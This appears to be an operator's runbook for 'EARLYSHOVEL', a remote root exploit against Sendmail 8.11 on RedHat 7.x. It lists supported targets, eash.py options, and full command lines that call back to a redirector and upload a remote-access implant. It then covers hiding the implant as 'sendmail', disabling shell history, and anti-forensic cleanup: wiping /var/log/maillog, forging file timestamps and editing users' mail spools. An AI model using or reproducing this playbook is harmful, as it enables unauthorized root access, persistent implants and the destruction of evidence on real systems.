######################################################### # EARLYSHOVEL ######################################################### ### publicly known vulnerability ### remote exploit available for linux RH7 running sendmail ###Supported targets: ### "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6 ### "RH70": RedHat 7.0 running Sendmail 8.11.0 ### "RH71": RedHat 7.1 running Sendmail 8.11.2 ### "RH73": RedHat 7.3 running Sendmail 8.11.6 ### requires valid user name ( 7.1 and 7.3) ### may also require valid domain for (7.3) mx :%s/REDIRECTOR_IP/REDIRECTOR_IP/g :%s/TARGET_IP/TARGET_IP/g :%s/TARGET_OS/TARGET_OS/g :%s/USER_NAME/USER_NAME/g :%s/DOMAIN/DOMAIN/g :%s/RANDOM_PORT/RANDOM_PORT/g `x #banner mail -scan mail TARGET_IP # alternate way to banner ##on pitch -tunnel l 2525 TARGET_IP 25 ###local scripted telnet 2525 ## after getting banner helo DOMAIN mail from: user@DOMAIN # use random user name ### may be getting rejected as spam??? $ ./eash.py -? usage: /current/bin/earlyshovel/eash.py [options] options --atimeout seconds (default = 30) Authentication timeout (in seconds) --cip IPAddress (default = Callback IP address --clport port Local callback port --cport port Callback port --ctimeout seconds (default = 30) Callback timeout (in seconds) --domain domainName Domain name of sender --exec filename File to exec on successful upload -? | --help Print the usage message --recipient emailAddress (default = root) Email recipient --target target Target OS --tip IPAddress (default = Target IP address --tmpnam filename Remote name of the uploaded file (of the form /tmp/fileXXXXXX)(def=filekdBtDF) --tport port (default = 25) Target port --upload filename File to upload Supported targets: "ASPRH73": ASP Linux 7.3 or RedHat 7.3 running Sendmail 8.11.6 "RH70": RedHat 7.0 running Sendmail 8.11.0 "RH71": RedHat 7.1 running Sendmail 8.11.2 "RH72": RedHat 7.2 running Sendmail 8.11.6 ### REDIRECTION -tunnel l 2525 TARGET_IP 25 r RANDOM_PORT ### LOCAL WINDOW: UPLOADS NOPEN AUTOMATCALLY- as of VERSION 2.4.0 cd /current/bin/earlyshovel ./eash.py --tip --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS --domain DOMAIN --exec /current/bin/noclient --upload /current/up/morerats/noserver- -OR- ### LOCAL WINDOW:MANUAL UPLOAD of NOPEN cd /current/bin/earlyshovel ./eash.py --tip --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS ./eash.py --tip --tport 2525 --cip REDIRECTOR_IP --cport RANDOM_PORT --recipient USER_NAME --target TARGET_OS --domain DOMAIN ### you will get an interactive root shell unset HISTFILE unset HISTFILESIZE unset HISTSIZE id pwd w # upload nopen as sendmail which uudecode uncompress mkdir /tmp/.scsi;cd /tmp/.scsi;pwd # if uudecode/uncompress exists: # LOCALLY cd /current/up cp /current/up/morerats/noserver- sendmail compress sendmail uuencode sendmail.Z sendmail.Z > sendmail.Z.uu gedit sendmail.Z.uu # on TARGET in interactive window uudecode; ls -la copy/paste gedit contents into this window umcompress sendmail.Z ls -l chmod 700 sendmail PATH=. sendmail # from redirector -nstun TARGET_IP ###END of MANUAL UPLOAD ###CLEANUP #if nopen is uploaded automatically: -ls /tmp/filekdBtDF -rm /tmp/filekdBtDF # look where mail may be logged grep mail /etc/syslog.conf -tail /var/log/maillog #remove mail messages from file grep USER_NAME /var/log/maillog # do this;if grep will clean everything needed -gs grepout USER_NAME /var/log/maillog # if our logs entries are the only entries in file cat /dev/null > /var/log/maillog #change timestamp of file -touch /var/log/? /var/log/maillog #delete mail msgs from users mail dir: path may be different -lt /var/spool/mail/USER_NAME -get /var/spool/mail/USER_NAME #locally cp /current/down/hostname.IP/var/spool/mail/USER_NAME /current/up/t cd /current/up/t #remove email from t -put /current/up/t t #target window #if it looks good cat t > /var/spool/mail/USER_NAME # touch file to a "good" date touch -t YYMMDDHHMM.ss /var/spool/mail/USER_NAME #does user have a home dir grep USER_NAME /etc/passwd # look for users home dir and list it -lt ?/?/USER_NAME ## look for .procmail or .forward files cat files if there....